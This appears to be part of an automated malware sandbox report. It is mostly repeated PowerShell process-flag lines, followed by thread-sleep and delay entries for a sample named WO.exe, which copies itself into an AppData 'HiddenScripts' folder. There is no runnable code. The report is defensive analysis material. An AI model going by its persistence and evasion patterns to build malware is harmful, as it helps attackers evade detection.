                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5850Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3893Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3699Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6036Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8497
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 927
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8020
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1422
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4804
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2035
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5291
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1751
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7924
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1679
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4232
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2187
                                  Source: C:\Users\user\Desktop\WO.exe TID: 6948Thread sleep count: 245 > 30Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1308Thread sleep count: 5850 > 30Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1544Thread sleep count: 3893 > 30Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2260Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5960Thread sleep count: 3699 > 30Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5960Thread sleep count: 6036 > 30Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2332Thread sleep time: -21213755684765971s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe TID: 4464Thread sleep count: 125 > 30Jump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe TID: 5928Thread sleep count: 124 > 30Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7044Thread sleep count: 8497 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7044Thread sleep count: 927 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2800Thread sleep time: -4611686018427385s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7048Thread sleep count: 8020 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7048Thread sleep count: 1422 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1196Thread sleep time: -2767011611056431s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1308Thread sleep count: 4804 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1308Thread sleep count: 2035 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7068Thread sleep time: -2767011611056431s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6184Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6356Thread sleep count: 5291 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6356Thread sleep count: 1751 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7044Thread sleep time: -2767011611056431s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6228Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe TID: 6356Thread sleep count: 84 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7068Thread sleep count: 7924 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7068Thread sleep count: 1679 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1236Thread sleep time: -4611686018427385s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6176Thread sleep count: 4232 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6176Thread sleep count: 2187 > 30
